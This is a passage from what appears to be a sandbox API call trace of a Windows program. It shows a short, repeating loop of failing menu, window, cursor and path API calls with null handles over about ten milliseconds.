pMore=0x0 | out: pszPath=0x0) returned 0 [0027.613] PathFileExistsW (pszPath=0x0) returned 0 [0027.613] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.613] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.613] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.613] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.613] GetMenu (hWnd=0x0) returned 0x0 [0027.613] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.613] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.613] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.613] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.613] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.613] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.613] GetStockObject (i=6) returned 0x1b00018 [0027.613] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.614] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.614] PathFileExistsW (pszPath=0x0) returned 0 [0027.614] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.614] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.614] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.614] GetMenu (hWnd=0x0) returned 0x0 [0027.614] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.614] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.614] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.614] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.614] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.614] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.614] GetStockObject (i=6) returned 0x1b00018 [0027.614] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.614] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.614] PathFileExistsW (pszPath=0x0) returned 0 [0027.614] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.614] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.614] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.614] GetMenu (hWnd=0x0) returned 0x0 [0027.614] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.614] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.614] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.614] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.614] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.614] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.614] GetStockObject (i=6) returned 0x1b00018 [0027.614] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.614] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.614] PathFileExistsW (pszPath=0x0) returned 0 [0027.614] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.614] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.615] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.615] GetMenu (hWnd=0x0) returned 0x0 [0027.615] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.615] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.615] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.615] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.615] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.615] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.615] GetStockObject (i=6) returned 0x1b00018 [0027.615] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.615] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.615] PathFileExistsW (pszPath=0x0) returned 0 [0027.615] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.615] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.615] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.615] GetMenu (hWnd=0x0) returned 0x0 [0027.615] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4e9) returned -1 [0027.615] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.615] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.615] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.615] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.615] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.615] GetStockObject (i=6) returned 0x1b00018 [0027.615] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.615] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.615] PathFileExistsW (pszPath=0x0) returned 0 [0027.615] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.615] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.615] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.615] GetMenu (hWnd=0x0) returned 0x0 [0027.616] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.616] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.616] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.616] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.616] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.616] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.616] GetStockObject (i=6) returned 0x1b00018 [0027.616] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.616] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.616] PathFileExistsW (pszPath=0x0) returned 0 [0027.616] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.616] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.616] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.616] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.616] GetMenu (hWnd=0x0) returned 0x0 [0027.616] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.616] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.616] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.616] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.616] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.616] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.616] GetStockObject (i=6) returned 0x1b00018 [0027.616] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.616] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.616] PathFileExistsW (pszPath=0x0) returned 0 [0027.616] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.616] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.616] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.616] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.616] GetMenu (hWnd=0x0) returned 0x0 [0027.616] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.616] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.617] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.617] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.617] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.617] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.617] GetStockObject (i=6) returned 0x1b00018 [0027.617] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.617] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.617] PathFileExistsW (pszPath=0x0) returned 0 [0027.617] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.617] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.617] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.617] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.617] GetMenu (hWnd=0x0) returned 0x0 [0027.617] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.617] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.617] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.617] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.617] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.617] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.617] GetStockObject (i=6) returned 0x1b00018 [0027.617] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.617] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.617] PathFileExistsW (pszPath=0x0) returned 0 [0027.617] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.617] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.617] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.617] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.617] GetMenu (hWnd=0x0) returned 0x0 [0027.617] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x287) returned -1 [0027.617] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.617] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.617] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.617] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.617] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.618] GetStockObject (i=6) returned 0x1b00018 [0027.618] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.618] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.618] PathFileExistsW (pszPath=0x0) returned 0 [0027.618] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.618] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.618] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.618] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.618] GetMenu (hWnd=0x0) returned 0x0 [0027.618] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.618] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.618] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.618] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.618] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.618] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.618] GetStockObject (i=6) returned 0x1b00018 [0027.618] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.618] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.618] PathFileExistsW (pszPath=0x0) returned 0 [0027.618] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.618] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.618] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.618] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.618] GetMenu (hWnd=0x0) returned 0x0 [0027.618] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.618] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.618] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.618] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.618] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.618] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.618] GetStockObject (i=6) returned 0x1b00018 [0027.618] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.618] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.619] PathFileExistsW (pszPath=0x0) returned 0 [0027.619] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.619] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.619] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.619] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.619] GetMenu (hWnd=0x0) returned 0x0 [0027.619] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.619] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.619] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.619] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.619] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.619] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.619] GetStockObject (i=6) returned 0x1b00018 [0027.619] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.619] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.619] PathFileExistsW (pszPath=0x0) returned 0 [0027.619] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.619] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.619] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.619] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.619] GetMenu (hWnd=0x0) returned 0x0 [0027.619] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.619] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.619] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.619] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.619] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.619] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.619] GetStockObject (i=6) returned 0x1b00018 [0027.619] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.619] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.619] PathFileExistsW (pszPath=0x0) returned 0 [0027.619] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.619] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.619] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.620] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.620] GetMenu (hWnd=0x0) returned 0x0 [0027.620] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4eb) returned -1 [0027.620] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.620] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.620] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.620] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.620] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.620] GetStockObject (i=6) returned 0x1b00018 [0027.620] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.620] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.620] PathFileExistsW (pszPath=0x0) returned 0 [0027.620] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.620] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.620] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.620] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.620] GetMenu (hWnd=0x0) returned 0x0 [0027.620] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.620] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.620] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.620] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.620] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.620] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.620] GetStockObject (i=6) returned 0x1b00018 [0027.620] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.620] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.620] PathFileExistsW (pszPath=0x0) returned 0 [0027.620] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.620] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.620] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.620] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.620] GetMenu (hWnd=0x0) returned 0x0 [0027.620] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.620] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.621] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.621] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.621] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.621] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.621] GetStockObject (i=6) returned 0x1b00018 [0027.621] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.621] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.621] PathFileExistsW (pszPath=0x0) returned 0 [0027.621] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.621] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.621] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.621] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.621] GetMenu (hWnd=0x0) returned 0x0 [0027.621] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.621] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.621] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.621] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.621] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.621] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.621] GetStockObject (i=6) returned 0x1b00018 [0027.621] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.621] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.621] PathFileExistsW (pszPath=0x0) returned 0 [0027.621] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.621] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.621] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.621] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.621] GetMenu (hWnd=0x0) returned 0x0 [0027.622] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.622] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.622] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.622] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.622] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.622] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.622] GetStockObject (i=6) returned 0x1b00018 [0027.622] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.622] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.622] PathFileExistsW (pszPath=0x0) returned 0 [0027.622] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.622] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.622] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.622] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.622] GetMenu (hWnd=0x0) returned 0x0 [0027.622] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x482) returned -1 [0027.622] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.622] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.622] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.622] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.622] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, 